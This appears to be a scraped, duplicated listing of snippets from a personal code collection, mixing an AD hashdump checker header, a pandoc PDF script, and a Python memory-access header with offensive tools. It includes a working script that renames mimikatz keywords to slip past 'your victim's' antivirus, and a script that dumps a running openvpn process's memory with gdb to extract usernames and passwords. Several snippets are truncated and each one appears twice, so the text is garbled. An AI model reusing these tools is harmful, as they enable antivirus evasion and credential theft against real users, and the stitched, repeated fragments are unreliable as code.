v4nyl

## check_hashes.py
#!/usr/bin/env python3

#Purpose: To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller
#Script requires a command line argument of a file containing usernames/hashes in the format of user:sid:LMHASH:NTLMHASH:::
# ./check_hashes.py <hash_dump>

import argparse
import re

parser = argparse.ArgumentParser(description="Check user hashes against each other to find users that share passwords")

## mimikatz_obfuscator.sh
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.

git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'

## anonymous
#!/bin/bash

# a pandoc script to easily turn formatted text files into PDFs - May 2016.
# based on a script by @pdfkungfoo, minor changes by Ange Albertini

# requires pandoc http://pandoc.org/
#  and either XeTeX http://xetex.sourceforge.net/ or LuaTeX http://www.luatex.org/
# Xelatex supports all system fonts by default, and UTF8.
# standard PDFLateX doesn't. LuaLaTex also does but is slower.

## openvpnScraper.sh
#!/bin/bash
# This little hack-job will grab credentials from a running openvpn process in Linux
# Keep in mind this won't work if the user used the --auth-nocache flag
pid=$(ps -efww | grep -v grep | grep openvpn | awk '{print $2}')
echo $pid | grep rw-p /proc/$pid/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do gdb --batch-silent --silent --pid $pid -ex "dump memory $pid-$start-$stop.dump 0x$start 0x$stop"; done
echo "Your credentials should be listed below as username/password"

strings *.dump | awk 'NR>=3 && NR<=4 { print }'
rm *.dump --force

## rdwr.py
#
# read/write access to python's memory, using a custom bytearray.
# some code taken from: http://tinyurl.com/q7duzxj
#
# tested on:
# Python 2.7.10, ubuntu 32bit
# Python 2.7.8, win32
#
# example of correct output:
# inspecting int=0x41424344, at 0x0228f898
	#!/usr/bin/env python3

	#Purpose: To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller
	#Script requires a command line argument of a file containing usernames/hashes in the format of user:sid:LMHASH:NTLMHASH:::
	# ./check_hashes.py <hash_dump>

	import argparse
	import re

	parser = argparse.ArgumentParser(description="Check user hashes against each other to find users that share passwords")
	# This script downloads and slightly "obfuscates" the mimikatz project.
	# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
	# so removing them from the project before compiling gets us past most of the AV solutions.
	# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
	# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.

	git clone https://github.com/gentilkiwi/mimikatz.git windows
	mv windows/mimikatz windows/windows
	find windows/ -type f -print0 \| xargs -0 sed -i 's/mimikatz/windows/g'
	find windows/ -type f -print0 \| xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
	#!/bin/bash

	# a pandoc script to easily turn formatted text files into PDFs - May 2016.
	# based on a script by @pdfkungfoo, minor changes by Ange Albertini

	# requires pandoc http://pandoc.org/
	# and either XeTeX http://xetex.sourceforge.net/ or LuaTeX http://www.luatex.org/
	# Xelatex supports all system fonts by default, and UTF8.
	# standard PDFLateX doesn't. LuaLaTex also does but is slower.
	#!/bin/bash
	# This little hack-job will grab credentials from a running openvpn process in Linux
	# Keep in mind this won't work if the user used the --auth-nocache flag
	pid=$(ps -efww \| grep -v grep \| grep openvpn \| awk '{print $2}')
	echo $pid \| grep rw-p /proc/$pid/maps \| sed -n 's/^\([0-9a-f]\)-\([0-9a-f]\) .*$/\1 \2/p' \| while read start stop; do gdb --batch-silent --silent --pid $pid -ex "dump memory $pid-$start-$stop.dump 0x$start 0x$stop"; done
	echo "Your credentials should be listed below as username/password"

	strings *.dump \| awk 'NR>=3 && NR<=4 { print }'
	rm *.dump --force
	#
	# read/write access to python's memory, using a custom bytearray.
	# some code taken from: http://tinyurl.com/q7duzxj
	#
	# tested on:
	# Python 2.7.10, ubuntu 32bit
	# Python 2.7.8, win32
	#
	# example of correct output:
	# inspecting int=0x41424344, at 0x0228f898